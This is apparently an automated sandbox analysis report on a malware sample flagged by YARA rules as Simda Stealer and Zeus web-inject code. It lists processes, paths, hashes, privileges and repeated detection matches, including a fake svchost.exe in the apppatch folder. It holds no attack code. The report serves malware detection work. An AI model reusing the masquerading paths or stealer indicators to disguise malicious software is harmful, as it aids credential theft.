Yara matches:	Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:46:58
Start date:	23/08/2024
Path:	C:\Windows\apppatch\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\apppatch\svchost.exe"
Imagebase:	0x400000
File size:	213'504 bytes
MD5 hash:	579DA5BACB532A6B1670BE4418070F62
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:47:33
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:47:34
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:47:34
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:47:35
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:47:35
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:47:35
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:47:35
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:47:36
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:47:37
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:47:38
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
